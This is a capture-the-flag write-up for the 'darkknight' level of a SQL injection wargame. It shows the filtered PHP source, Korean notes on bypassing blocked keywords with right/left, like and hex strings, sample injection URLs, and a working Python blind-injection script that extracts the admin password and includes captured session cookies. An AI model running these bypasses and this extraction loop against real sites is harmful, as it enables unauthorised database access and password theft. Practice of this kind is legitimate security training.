query : {$query}
"; $result = @mysql_fetch_array(mysql_query($query)); if($result['id']) echo "Hello {$result[id]}
"; $_GET[pw] = addslashes($_GET[pw]); $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; $result = @mysql_fetch_array(mysql_query($query)); if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); highlight_file(__FILE__); ?>
pw에 ' 가 들어가면 안되고
no에 ' substr ascii = 가 들어가면 안된다
substr 대신 right, left를 이용한다.
substr('abc',2,1)==right(left('abc',2),1)
= 대신 like를 이용한다.
'이 들어가면 안되므로 'admin'을 0x61646d696e로 써준다.
?pw=1&no=123||id like 0x61646d696e and length(pw)>5
?pw=1&no=123||id like 0x61646d696e and right(left(pw,3),1)>char(50)
import requests


def main():
    """Recover the admin password character by character with a boolean blind SQL injection.

    For position ``i`` the injected condition asks whether
    ``right(left(pw, i), 1) > char(x)``; ``x`` is raised from 31 until the
    comparison stops holding, and ``chr(x)`` is then the character at position ``i``.

    The oracle is the *position* of the first ``"Hello"`` in the response, not its
    presence: the target page echoes ``Hello <id>`` near the top only when the
    injected condition selects a row, and the same word also occurs later in the
    highlighted PHP source that the page always prints. ``find("Hello") > 1000``
    therefore reads as "no row matched" (early echo absent); the 1000 threshold
    presumably sits between the echo and the highlighted copy — confirm against a
    live response.

    Side effects: one HTTP GET per probe, and a ``GOOD <position>: <char>`` line
    printed per recovered character. Nothing is returned. In access logs the
    activity shows up as a long run of GETs to one URL differing only in the two
    integers of the condition.
    """
    # Session cookies captured from a browser; PHPSESSID is a per-session value and
    # has to be refreshed once that session expires.
    session_cookies = {
        "__cfduid": "d282347679afbe7ce118657ef96dd67f61530072154",
        "PHPSESSID": "25bfqp0uqr6pmep83spki2t522",
    }
    base_url = "https://los.eagle-jump.org/darkknight_f76e2eebfeeeec2b7699a9ae976f574d.php"

    # Only positions 1..8 are probed: the bound is fixed, so a longer password
    # would not be fully recovered by this loop.
    for position in range(1, 9):
        candidate = 30
        while True:
            candidate += 1
            # right(left(pw, i), 1) stands in for substr(pw, i, 1) and `like`
            # stands in for `=`, because the challenge blocks substr and = in `no`.
            # 0x61646d696e is the hex form of 'admin', avoiding the blocked quote.
            probe_url = (
                f"{base_url}?pw=1&no=123||id like 0x61646d696e"
                f" and right(left(pw,{position}),1)>char({candidate})"
            )
            response = requests.get(probe_url, cookies=session_cookies)
            if response.text.find("Hello") > 1000:
                print(f"GOOD {position}: {chr(candidate)}")
                break


if __name__ == "__main__":
    main()